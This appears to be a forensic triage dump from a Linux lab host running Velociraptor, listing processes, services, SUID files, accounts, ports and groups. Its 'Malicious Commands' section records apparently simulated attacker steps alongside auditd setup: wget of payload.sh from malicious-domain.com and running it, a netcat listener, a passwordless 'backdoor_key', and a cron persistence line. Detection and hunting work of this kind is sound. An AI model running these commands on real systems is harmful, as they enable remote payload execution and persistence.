/org/gtk/gvfs/exec_spaw/3 champus+ 10741 0.0 1.0 2428568 65204 ? Sl 11:47 0:26 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {7824f062-f181-48fd-85a5-9646d4287f73} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 14 tab champus+ 10748 0.0 1.0 2428568 65296 ? Sl 11:47 0:26 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {31607e45-8b35-41da-9de7-799bfb0700ea} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 15 tab champus+ 10754 0.0 1.0 2428568 65088 ? Sl 11:47 0:26 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {3a17b899-5005-4e4a-82f2-292b77770c09} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 16 tab root 10934 0.0 0.0 0 0 ? I 11:50 0:03 [kworker/1:1-mm_percpu_wq] root 23306 0.0 0.0 0 0 ? I 16:23 0:00 [kworker/u4:2] root 24156 0.0 0.0 0 0 ? I 16:53 0:01 [kworker/0:1-events] root 24945 0.0 0.0 0 0 ? I 18:38 0:00 [kworker/u5:1-events_unbound] root 24992 0.0 0.0 0 0 ? I 18:45 0:00 [kworker/u6:3-events_unbound] root 25203 0.0 0.0 0 0 ? I 19:21 0:00 [kworker/u5:3-events_power_efficient] root 25287 0.0 0.0 0 0 ? I 19:35 0:00 [kworker/u6:1-flush-8:0] root 25465 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/0:2-events] root 25479 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/u6:2-flush-8:0] root 25485 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/u5:0-flush-8:0] root 25508 0.0 0.0 0 0 ? I 19:46 0:00 [kworker/1:2-cgroup_destroy] champus+ 25558 0.4 1.0 3057456 64080 ? Sl 19:48 0:01 gjs /usr/share/gnome-shell/extensions/[email protected]/ding.js -E -P /usr/share/gnome-shell/extensions/[email protected] -M 0 -D 0:0:1280:800:1:27:0:0:0:0 champus+ 25620 0.0 0.3 35940 19456 ? S 19:49 0:00 /usr/bin/python3 /usr/bin/gnome-terminal --wait champus+ 25621 0.0 0.4 307540 27904 ? Sl 19:49 0:00 /usr/bin/gnome-terminal.real --wait champus+ 25624 1.1 0.7 889108 48488 ? Ssl 19:49 0:03 /usr/libexec/gnome-terminal-server champus+ 25647 0.0 0.0 11268 5504 pts/0 Ss 19:49 0:00 bash root 25669 0.0 0.0 0 0 ? I 19:49 0:00 [kworker/0:0-events] root 25715 0.0 0.0 0 0 ? I 19:50 0:00 [kworker/u5:2-events_power_efficient] root 25716 0.0 0.0 0 0 ? I 19:50 0:00 [kworker/u6:0-writeback] root 25736 0.0 0.1 14348 6272 pts/0 S+ 19:51 0:00 sudo -i root 25737 0.0 0.0 14348 2512 pts/1 Ss 19:51 0:00 sudo -i root 25738 0.0 0.0 11396 5504 pts/1 S 19:51 0:00 -bash root 25780 0.0 0.0 11396 3804 pts/1 S+ 19:53 0:00 -bash root 25786 0.0 0.0 12672 3456 pts/1 R+ 19:53 0:00 ps aux --------------------------------- List files: total 68 drwxrwxrwt 17 root root 4096 Nov 6 19:48 . drwxr-xr-x 20 root root 4096 Aug 27 17:11 .. drwxrwxrwt 2 root root 4096 Nov 6 11:09 .font-unix -rw------- 1 champuser champuser 0 Nov 6 11:09 gdm3-config-err-4Hw2lH drwxrwxrwt 2 root root 4096 Nov 6 11:09 .ICE-unix drwx------ 4 root root 4096 Nov 6 11:42 snap-private-tmp drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-colord.service-hijiiC drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-ModemManager.service-pubDje drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-power-profiles-daemon.service-Msg1Aw drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-switcheroo-control.service-vc6JUV drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-logind.service-mRItdE drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-oomd.service-ZSLhw3 drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-resolved.service-qTOjod drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-timesyncd.service-d7gdD4 drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-upower.service-k0lchS drwxrwxrwt 2 root root 4096 Nov 6 11:09 .Test-unix drwxrwxrwt 2 root root 4096 Nov 6 11:09 .X11-unix drwxrwxrwt 2 root root 4096 Nov 6 11:09 .XIM-unix total 12 drwxr-xr-x 3 root root 4096 Nov 1 13:49 . drwxr-xr-x 20 root root 4096 Aug 27 17:11 .. drwx------ 16 root root 4096 Oct 4 16:23 velociraptor --------------------------------- List Update.custom UNIT LOAD ACTIVE SUB DESCRIPTION proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda1.device loaded active plugged QEMU_HARDDISK 1 sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda2.device loaded active plugged QEMU_HARDDISK EFI\x20System\x20Partition sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda3.device loaded active plugged QEMU_HARDDISK 3 sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda.device loaded active plugged QEMU_HARDDISK sys-devices-pci0000:00-0000:00:12.0-virtio1-net-ens18.device loaded active plugged Virtio network device sys-devices-platform-serial8250-serial8250:0-serial8250:0.0-tty-ttyS0.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.0/tty/ttyS0 sys-devices-platform-serial8250-serial8250:0-serial8250:0.1-tty-ttyS1.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.1/tty/ttyS1 sys-devices-platform-serial8250-serial8250:0-serial8250:0.10-tty-ttyS10.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.10/tty/ttyS10 sys-devices-platform-serial8250-serial8250:0-serial8250:0.11-tty-ttyS11.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.11/tty/ttyS11 sys-devices-platform-serial8250-serial8250:0-serial8250:0.12-tty-ttyS12.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.12/tty/ttyS12 sys-devices-platform-serial8250-serial8250:0-serial8250:0.13-tty-ttyS13.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.13/tty/ttyS13 sys-devices-platform-serial8250-serial8250:0-serial8250:0.14-tty-ttyS14.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.14/tty/ttyS14 sys-devices-platform-serial8250-serial8250:0-serial8250:0.15-tty-ttyS15.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.15/tty/ttyS15 sys-devices-platform-serial8250-serial8250:0-serial8250:0.16-tty-ttyS16.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.16/tty/ttyS16 sys-devices-platform-serial8250-serial8250:0-serial8250:0.17-tty-ttyS17.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.17/tty/ttyS17 sys-devices-platform-serial8250-serial8250:0-serial8250:0.18-tty-ttyS18.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.18/tty/ttyS18 sys-devices-platform-serial8250-serial8250:0-serial8250:0.19-tty-ttyS19.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.19/tty/ttyS19 sys-devices-platform-serial8250-serial8250:0-serial8250:0.2-tty-ttyS2.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.2/tty/ttyS2 sys-devices-platform-serial8250-serial8250:0-serial8250:0.20-tty-ttyS20.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.20/tty/ttyS20 sys-devices-platform-serial8250-serial8250:0-serial8250:0.21-tty-ttyS21.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.21/tty/ttyS21 sys-devices-platform-serial8250-serial8250:0-serial8250:0.22-tty-ttyS22.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.22/tty/ttyS22 sys-devices-platform-serial8250-serial8250:0-serial8250:0.23-tty-ttyS23.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.23/tty/ttyS23 sys-devices-platform-serial8250-serial8250:0-serial8250:0.24-tty-ttyS24.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.24/tty/ttyS24 sys-devices-platform-serial8250-serial8250:0-serial8250:0.25-tty-ttyS25.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.25/tty/ttyS25 sys-devices-platform-serial8250-serial8250:0-serial8250:0.26-tty-ttyS26.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.26/tty/ttyS26 sys-devices-platform-serial8250-serial8250:0-serial8250:0.27-tty-ttyS27.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.27/tty/ttyS27 sys-devices-platform-serial8250-serial8250:0-serial8250:0.28-tty-ttyS28.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.28/tty/ttyS28 sys-devices-platform-serial8250-serial8250:0-serial8250:0.29-tty-ttyS29.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.29/tty/ttyS29 sys-devices-platform-serial8250-serial8250:0-serial8250:0.3-tty-ttyS3.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.3/tty/ttyS3 sys-devices-platform-serial8250-serial8250:0-serial8250:0.30-tty-ttyS30.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.30/tty/ttyS30 sys-devices-platform-serial8250-serial8250:0-serial8250:0.31-tty-ttyS31.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.31/tty/ttyS31 sys-devices-platform-serial8250-serial8250:0-serial8250:0.4-tty-ttyS4.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.4/tty/ttyS4 sys-devices-platform-serial8250-serial8250:0-serial8250:0.5-tty-ttyS5.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.5/tty/ttyS5 sys-devices-platform-serial8250-serial8250:0-serial8250:0.6-tty-ttyS6.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.6/tty/ttyS6 sys-devices-platform-serial8250-serial8250:0-serial8250:0.7-tty-ttyS7.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.7/tty/ttyS7 sys-devices-platform-serial8250-serial8250:0-serial8250:0.8-tty-ttyS8.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.8/tty/ttyS8 sys-devices-platform-serial8250-serial8250:0-serial8250:0.9-tty-ttyS9.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.9/tty/ttyS9 sys-devices-virtual-block-loop0.device loaded active plugged /sys/devices/virtual/block/loop0 sys-devices-virtual-block-loop1.device loaded active plugged /sys/devices/virtual/block/loop1 sys-devices-virtual-block-loop10.device loaded active plugged /sys/devices/virtual/block/loop10 sys-devices-virtual-block-loop11.device loaded active plugged /sys/devices/virtual/block/loop11 sys-devices-virtual-block-loop12.device loaded active plugged /sys/devices/virtual/block/loop12 sys-devices-virtual-block-loop13.device loaded active plugged /sys/devices/virtual/block/loop13 sys-devices-virtual-block-loop2.device loaded active plugged /sys/devices/virtual/block/loop2 sys-devices-virtual-block-loop3.device loaded active plugged /sys/devices/virtual/block/loop3 sys-devices-virtual-block-loop4.device loaded active plugged /sys/devices/virtual/block/loop4 sys-devices-virtual-block-loop5.device loaded active plugged /sys/devices/virtual/block/loop5 sys-devices-virtual-block-loop6.device loaded active plugged /sys/devices/virtual/block/loop6 sys-devices-virtual-block-loop7.device loaded active plugged /sys/devices/virtual/block/loop7 sys-devices-virtual-block-loop8.device loaded active plugged /sys/devices/virtual/block/loop8 sys-devices-virtual-block-loop9.device loaded active plugged /sys/devices/virtual/block/loop9 sys-devices-virtual-misc-rfkill.device loaded active plugged /sys/devices/virtual/misc/rfkill sys-devices-virtual-tty-ttyprintk.device loaded active plugged /sys/devices/virtual/tty/ttyprintk sys-module-configfs.device loaded active plugged /sys/module/configfs sys-module-fuse.device loaded active plugged /sys/module/fuse sys-subsystem-net-devices-ens18.device loaded active plugged Virtio network device -.mount loaded active mounted Root Mount boot-efi.mount loaded active mounted /boot/efi dev-hugepages.mount loaded active mounted Huge Pages File System dev-mqueue.mount loaded active mounted POSIX Message Queue File System proc-sys-fs-binfmt_misc.mount loaded active mounted Arbitrary Executable File Formats File System run-credentials-systemd\x2dsysusers.service.mount loaded active mounted /run/credentials/systemd-sysusers.service run-snapd-ns-firefox.mnt.mount loaded active mounted /run/snapd/ns/firefox.mnt run-snapd-ns-snapd\x2ddesktop\x2dintegration.mnt.mount loaded active mounted /run/snapd/ns/snapd-desktop-integration.mnt run-snapd-ns.mount loaded active mounted /run/snapd/ns run-user-1000-doc.mount loaded active mounted /run/user/1000/doc run-user-1000-gvfs.mount loaded active mounted /run/user/1000/gvfs run-user-1000.mount loaded active mounted /run/user/1000 snap-bare-5.mount loaded active mounted Mount unit for bare, revision 5 snap-core22-2133.mount loaded active mounted Mount unit for core22, revision 2133 snap-core22-2139.mount loaded active mounted Mount unit for core22, revision 2139 snap-firefox-7084.mount loaded active mounted Mount unit for firefox, revision 7084 snap-firefox-7177.mount loaded active mounted Mount unit for firefox, revision 7177 snap-gnome\x2d42\x2d2204-202.mount loaded active mounted Mount unit for gnome-42-2204, revision 202 snap-gnome\x2d42\x2d2204-226.mount loaded active mounted Mount unit for gnome-42-2204, revision 226 snap-gtk\x2dcommon\x2dthemes-1535.mount loaded active mounted Mount unit for gtk-common-themes, revision 1535 snap-snap\x2dstore-1113.mount loaded active mounted Mount unit for snap-store, revision 1113 snap-snap\x2dstore-1216.mount loaded active mounted Mount unit for snap-store, revision 1216 snap-snapd-25202.mount loaded active mounted Mount unit for snapd, revision 25202 snap-snapd-25577.mount loaded active mounted Mount unit for snapd, revision 25577 snap-snapd\x2ddesktop\x2dintegration-178.mount loaded active mounted Mount unit for snapd-desktop-integration, revision 178 snap-snapd\x2ddesktop\x2dintegration-315.mount loaded active mounted Mount unit for snapd-desktop-integration, revision 315 sys-fs-fuse-connections.mount loaded active mounted FUSE Control File System sys-kernel-config.mount loaded active mounted Kernel Configuration File System sys-kernel-debug-tracing.mount loaded active mounted /sys/kernel/debug/tracing sys-kernel-debug.mount loaded active mounted Kernel Debug File System sys-kernel-tracing.mount loaded active mounted Kernel Trace File System acpid.path loaded active running ACPI Events Check cups.path loaded active running CUPS Scheduler systemd-ask-password-plymouth.path loaded active waiting Forward Password Requests to Plymouth Directory Watch systemd-ask-password-wall.path loaded active waiting Forward Password Requests to Wall Directory Watch whoopsie.path loaded active waiting Start whoopsie on modification of the /var/crash directory init.scope loaded active running System and Service Manager session-2.scope loaded active running Session 2 of User champuser accounts-daemon.service loaded active running Accounts Service acpid.service loaded active running ACPI event daemon apparmor.service loaded active exited Load AppArmor profiles apport.service loaded active exited LSB: automatic crash report generation auditd.service loaded active running Security Auditing Service avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack colord.service loaded active running Manage, Install and Generate Color Profiles console-setup.service loaded active exited Set console font and keymap cron.service loaded active running Regular background program processing daemon cups-browsed.service loaded active running Make remote CUPS printers available locally cups.service loaded active running CUPS Scheduler dbus.service loaded active running D-Bus System Message Bus gdm.service loaded active running GNOME Display Manager irqbalance.service loaded active running irqbalance daemon kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures keyboard-setup.service loaded active exited Set the console keyboard layout kmod-static-nodes.service loaded active exited Create List of Static Device Nodes ModemManager.service loaded active running Modem Manager networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd NetworkManager-wait-online.service loaded active exited Network Manager Wait Online NetworkManager.service loaded active running Network Manager openvpn.service loaded active exited OpenVPN service packagekit.service loaded active running PackageKit Daemon plymouth-quit-wait.service loaded active exited Hold until boot process finishes up plymouth-read-write.service loaded active exited Tell Plymouth To Write Out Runtime Data plymouth-start.service loaded active exited Show Plymouth Boot Screen podman-restart.service loaded active exited Podman Start All Containers With Restart Policy Set To Always polkit.service loaded active running Authorization Manager power-profiles-daemon.service loaded active running Power Profiles daemon rsyslog.service loaded active running System Logging Service rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service setvtrgb.service loaded active exited Set console scheme snapd.apparmor.service loaded active exited Load AppArmor profiles managed internally by snapd snapd.seeded.service loaded active exited Wait until snapd is fully seeded snapd.service loaded active running Snap Daemon switcheroo-control.service loaded active running Switcheroo Control Proxy service systemd-binfmt.service loaded active exited Set Up Additional Binary Formats systemd-fsck@dev-disk-by\x2duuid-4015\x2d7165.service loaded active exited File System Check on /dev/disk/by-uuid/4015-7165 systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage systemd-journald.service loaded active running Journal Service systemd-logind.service loaded active running User Login Management systemd-modules-load.service loaded active exited Load Kernel Modules systemd-oomd.service loaded active running Userspace Out-Of-Memory (OOM) Killer systemd-random-seed.service loaded active exited Load/Save Random Seed systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems systemd-resolved.service loaded active running Network Name Resolution systemd-sysctl.service loaded active exited Apply Kernel Variables systemd-sysusers.service loaded active exited Create System Users systemd-timesyncd.service loaded active running Network Time Synchronization systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories systemd-udev-trigger.service loaded active exited Coldplug All udev Devices systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files systemd-update-utmp.service loaded active exited Record System Boot/Shutdown in UTMP systemd-user-sessions.service loaded active exited Permit User Sessions udisks2.service loaded active running Disk Manager ufw.service loaded active exited Uncomplicated firewall unattended-upgrades.service loaded active running Unattended Upgrades Shutdown upower.service loaded active running Daemon for power management [email protected] loaded active exited User Runtime Directory /run/user/1000 [email protected] loaded active running User Manager for UID 1000 velociraptor.service loaded active running Velociraprot linux amd64 wpa_supplicant.service loaded active running WPA supplicant -.slice loaded active active Root Slice system-getty.slice loaded active active Slice /system/getty system-modprobe.slice loaded active active Slice /system/modprobe system-systemd\x2dfsck.slice loaded active active Slice /system/systemd-fsck system.slice loaded active active System Slice user-1000.slice loaded active active User Slice of UID 1000 user.slice loaded active active User and Session Slice acpid.socket loaded active running ACPID Listen Socket avahi-daemon.socket loaded active running Avahi mDNS/DNS-SD Stack Activation Socket cups.socket loaded active running CUPS Scheduler dbus.socket loaded active running D-Bus System Message Bus Socket podman.socket loaded active listening Podman API Socket snapd.socket loaded active running Socket activation for snappy daemon syslog.socket loaded active running Syslog Socket systemd-fsckd.socket loaded active listening fsck to fsckd communication Socket systemd-initctl.socket loaded active listening initctl Compatibility Named Pipe systemd-journald-audit.socket loaded active running Journal Audit Socket systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log) systemd-journald.socket loaded active running Journal Socket systemd-rfkill.socket loaded active listening Load/Save RF Kill Switch Status /dev/rfkill Watch systemd-udevd-control.socket loaded active running udev Control Socket systemd-udevd-kernel.socket loaded active running udev Kernel Socket uuidd.socket loaded active listening UUID daemon activation socket swapfile.swap loaded active active /swapfile basic.target loaded active active Basic System cryptsetup.target loaded active active Local Encrypted Volumes getty-pre.target loaded active active Preparation for Logins getty.target loaded active active Login Prompts graphical.target loaded active active Graphical Interface local-fs-pre.target loaded active active Preparation for Local File Systems local-fs.target loaded active active Local File Systems multi-user.target loaded active active Multi-User System network-online.target loaded active active Network is Online network-pre.target loaded active active Preparation for Network network.target loaded active active Network nss-lookup.target loaded active active Host and Network Name Lookups nss-user-lookup.target loaded active active User and Group Name Lookups paths.target loaded active active Path Units remote-fs.target loaded active active Remote File Systems slices.target loaded active active Slice Units snapd.mounts-pre.target loaded active active Mounting snaps snapd.mounts.target loaded active active Mounted snaps sockets.target loaded active active Socket Units swap.target loaded active active Swaps sysinit.target loaded active active System Initialization time-set.target loaded active active System Time Set timers.target loaded active active Timer Units veritysetup.target loaded active active Local Verity Protected Volumes anacron.timer loaded active waiting Trigger anacron every hour apt-daily-upgrade.timer loaded active waiting Daily apt upgrade and clean activities apt-daily.timer loaded active waiting Daily apt download activities dpkg-db-backup.timer loaded active waiting Daily dpkg database backup timer e2scrub_all.timer loaded active waiting Periodic ext4 Online Metadata Check for All Filesystems fstrim.timer loaded active waiting Discard unused blocks once a week fwupd-refresh.timer loaded active waiting Refresh fwupd metadata regularly logrotate.timer loaded active waiting Daily rotation of log files man-db.timer loaded active waiting Daily man-db regeneration motd-news.timer loaded active waiting Message of the Day podman-auto-update.timer loaded active waiting Podman auto-update timer systemd-tmpfiles-clean.timer loaded active waiting Daily Cleanup of Temporary Directories update-notifier-download.timer loaded active waiting Download data for packages that failed at package install time update-notifier-motd.timer loaded active waiting Check to see whether there is a new version of Ubuntu available LOAD = Reflects whether the unit definition was properly loaded. ACTIVE = The high-level unit activation state, i.e. generalization of SUB. SUB = The low-level unit activation state, values depend on unit type. 220 loaded units listed. Pass --all to see loaded but inactive units, too. To show all installed unit files use 'systemctl list-unit-files'. --------------------------------- CronJob --------------------------------- suid /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/gpasswd /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/chfn /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/mount /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/newgrp /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/chsh /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/passwd /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/umount /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/su /snap/core22/2133/usr/bin/chfn /snap/core22/2133/usr/bin/chsh /snap/core22/2133/usr/bin/gpasswd /snap/core22/2133/usr/bin/mount /snap/core22/2133/usr/bin/newgrp /snap/core22/2133/usr/bin/passwd /snap/core22/2133/usr/bin/su /snap/core22/2133/usr/bin/sudo /snap/core22/2133/usr/bin/umount /snap/core22/2133/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core22/2133/usr/lib/openssh/ssh-keysign /snap/core22/2133/usr/libexec/polkit-agent-helper-1 /snap/core22/2139/usr/bin/chfn /snap/core22/2139/usr/bin/chsh /snap/core22/2139/usr/bin/gpasswd /snap/core22/2139/usr/bin/mount /snap/core22/2139/usr/bin/newgrp /snap/core22/2139/usr/bin/passwd /snap/core22/2139/usr/bin/su /snap/core22/2139/usr/bin/sudo /snap/core22/2139/usr/bin/umount /snap/core22/2139/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core22/2139/usr/lib/openssh/ssh-keysign /snap/core22/2139/usr/libexec/polkit-agent-helper-1 /usr/bin/fusermount3 /usr/bin/gpasswd /usr/bin/pkexec /usr/bin/chfn /usr/bin/mount /usr/bin/newuidmap /usr/bin/newgrp /usr/bin/chsh /usr/bin/passwd /usr/bin/newgidmap /usr/bin/umount /usr/bin/sudo /usr/bin/su /usr/libexec/polkit-agent-helper-1 /usr/sbin/pppd /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/snapd/snap-confine /usr/lib/xorg/Xorg.wrap --------------------------------- Malicious Commands chmod +x /usr/local/bin/velociraptor velociraptor config generate -i nano /root/server.config.yaml nano /lib/systemd/system/velociraptor.service systemctl daemon-reload systemctl enable --now velociraptor systemctl status velociraptor systemctl restart velociraptor.service nano /root/server.config.yaml systemctl restart velociraptor.service cls clear the key should be located in HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated however. The "Installer" section is non existent meaning the key doesnt exist for whatever reason I was only able to locate 17 registry keys using the hunt function. Lets move to windows now ls pwd cat server.config.yaml wget http://malicious-domain.com/payload.sh chmod +x payload.sh ./payload.sh nc -lvp 4444 ssh-keygen -t rsa -b 4096 -f /root/.ssh/backdoor_key -N "" echo "* * * * * /tmp/persistence.sh" \| crontab - cd .ssh cd /.ssh wget http://malicious-domain.com/payload.sh chmod +x payload.sh ./payload.sh nc -lvp 4444 ssh-keygen -t rsa -b 4096 -f /root/.ssh/backdoor_key -N "" echo "* * * * * /tmp/persistence.sh" \| crontab - apt install net-tools cls cleart clear install auditd apt install auditd clear wget https://raw.githubusercontent.com/Neo23x0/auditd/refs/heads/master/auditrules -O /etc/audit/rules.d/audit.rules clear wget https://raw.githubusercontent.com/Neo23x0/auditd/refs/heads/master/audit.rules -O /etc/audit/rules.d/audit.rules clear systemctl restart audit.d cleart clear systemctl restart auditd systemctl status auditd clear tail /var/log/audit/auditlog clear tail /var/log/audit/audit.log clear wget https://research.cyfidant.com clear cat /var/log/audit/audit.log \| grep wget clear grep wget /var/log/audit/audit.loc grep wget /var/log/audit/audit.log grep https://research.cyfidant.com /var/log/audit/audit.log	List User Accounts _apt avahi avahi-autoipd backup bin champuser colord cups-pk-helper daemon dnsmasq fwupd-refresh games gdm geoclue gnats gnome-initial-setup hplip irc kernoops list lp mail man messagebus news nm-openvpn nobody proxy pulse root rtkit saned speech-dispatcher sssd sudoadmin sync sys syslog systemd-network systemd-oom systemd-resolve systemd-timesync tcpdump tss usbmux uucp uuidd whoopsie www-data -------------------------------- Networks opening Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 10.0.17.48:8001 0.0.0.0:* LISTEN 721/velociraptor tcp 0 0 10.0.17.48:8003 0.0.0.0:* LISTEN 721/velociraptor tcp 0 0 10.0.17.48:8889 0.0.0.0:* LISTEN 721/velociraptor tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 381/systemd-resolve tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 645/cupsd tcp6 0 0 ::1:631 :::* LISTEN 645/cupsd tcp6 0 0 :::8000 :::* LISTEN 721/velociraptor udp 0 0 127.0.0.53:53 0.0.0.0:* 381/systemd-resolve udp 0 0 0.0.0.0:5353 0.0.0.0:* 491/avahi-daemon: r udp 0 0 0.0.0.0:51761 0.0.0.0:* 491/avahi-daemon: r udp6 0 0 :::44447 :::* 491/avahi-daemon: r udp6 0 0 :::5353 :::* 491/avahi-daemon: r raw6 0 0 :::58 :::* 7 496/NetworkManager --------------------------------- Local Groups Information root:x:0: daemon:x:1: bin:x:2: sys:x:3: adm:x:4:syslog,champuser tty:x:5: disk:x:6: lp:x:7: mail:x:8: news:x:9: uucp:x:10: man:x:12: proxy:x:13: kmem:x:15: dialout:x:20: fax:x:21: voice:x:22: cdrom:x:24:champuser floppy:x:25: tape:x:26: sudo:x:27:champuser,sudoadmin audio:x:29:pulse dip:x:30:champuser www-data:x:33: backup:x:34: operator:x:37: list:x:38: irc:x:39: src:x:40: gnats:x:41: shadow:x:42: utmp:x:43: video:x:44: sasl:x:45: plugdev:x:46:champuser staff:x:50: games:x:60: users:x:100: nogroup:x:65534: systemd-journal:x:101: systemd-network:x:102: systemd-resolve:x:103: crontab:x:104: messagebus:x:105: systemd-timesync:x:106: input:x:107: sgx:x:108: kvm:x:109: render:x:110: syslog:x:111: _ssh:x:112: tss:x:113: 